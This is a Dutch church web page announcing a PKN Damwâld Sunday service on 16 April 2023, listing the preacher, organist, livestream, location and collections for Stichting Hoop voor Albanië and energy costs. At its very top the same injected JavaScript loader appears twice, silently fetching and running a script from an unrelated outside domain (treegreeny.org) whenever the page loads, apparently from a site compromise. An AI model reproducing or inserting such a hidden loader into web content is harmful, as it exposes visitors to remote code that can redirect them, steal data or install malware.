;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 16 april 2023 9:30 uur - PKN Damwâld
zondag 16 april 2023
09:30 uur

Kerkdienst zondag 16 april 2023 9:30 uur

Informatie

Voorganger:Ds. G.J. Otter
Organist:Joop de Jong
LivestreamDienst terugkijken
Bekijk op Youtube
Locatie: de Ontmoeting Foarwei 38, 9104 BX Damwâld
Collecte informatie
Eerste collecte: Kerk
Tweede collecte: Collecte Diaconie: Stichting Hoop voor Albanië (collectenr. 23037)

Stichting Hoop voor Albanië is sinds 1991 betrokken bij de hulpverlening en armoedebestrijding in Albanië. De stichting werkt vanuit een christelijke levensvisie en draagt dat ook uit in haar werk. De stichting is erop gericht gelijkwaardige kansen te creëren voor de allerarmsten zoals de Roma bevolking, zieken, gehandicapten en (dementerende) ouderen in Albanië. De stichting verbindt Albanese initiatiefnemers op het gebied van werkgelegenheid en ondersteunt lokale initiatiefnemers met middelen die nodig zijn om hun doel te bereiken.

Uitganscollecte: Uitgangscollecte t.b.v. de gestegen energiekosten